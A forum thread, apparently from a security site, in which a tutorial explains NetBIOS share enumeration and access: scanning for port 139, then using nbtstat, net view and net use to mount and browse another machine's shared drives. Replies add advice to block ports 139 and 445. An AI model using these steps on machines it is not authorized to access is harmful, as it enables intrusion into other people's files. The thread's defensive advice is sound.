net bios hacking

[RiOtEr]

NetBIOS Tutorial by RiOtEr

NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.

1. NetBIOS

To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

If your results look like that then you're set...

2. nbtstat

To get the info you need for the attack we use a program called nbtstat:

Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.

Code:

c:\>nbtstat -A 127.0.0.1

Use -A if you're using IP addresses. If you're going to use hostnames use -a.

This will give you what is called a nametable:

Code:

Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    computername      <00>  UNIQUE      Registered
    workgroupname     <00>  GROUP       Registered
    computername      <20>  UNIQUE      Registered
    workgroupname     <1E>  GROUP       Registered
    workgroupname     <1D>  UNIQUE      Registered
    ..__MSBROWSE__.   <01>  GROUP       Registered

    MAC Address = xx-xx-xx-xx-xx-xx

This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)

Now, the line

Code:

computername      <20>  UNIQUE      Registered

is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress

Code:

C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name  Type  Used as  Comment

-----------------------------------
SharedDocs  Disk
The command completed successfully.

That's the result you should get (it wil be different on a non-WinXP box ).

Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name

Code:

c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.

Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:

Code:

c:\>cd g:
g:\>

In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:

Code:

c:\>net use /delete g:
g: was deleted successfully.

Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:

Code:

net use password \\ip\sharename

(not sure about that one...)

Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your windows machine to be hacked withough proper protection... Moral of this story: always cover port 139.

RiOtEr

[Rewandythal]

great post Rioter.

[JRoc]

Thank yah!

[jethro]

fl00t!

[jaguar291]

Good post, I learned something!

[ammo]

<quote>Moral of this story: always cover port 139.</quote>

True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...

Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

Ammo

[NetwrkBurn]

So when you port scan a system and netbios services are open you can just use net to connect and rummange through their directories?

[ammo]

Sometimes...

Depends if there are actually drives shared, and depends on if passwords are set.

Ammo

[preep]

very good, expect some green, amn best tut ive ever read.

preep

[RuffRyder]

um... ur all probably gunna tell me i have stupid questions but at least i might be safe if its answered, if u have a firewall doesnt it protect all ports?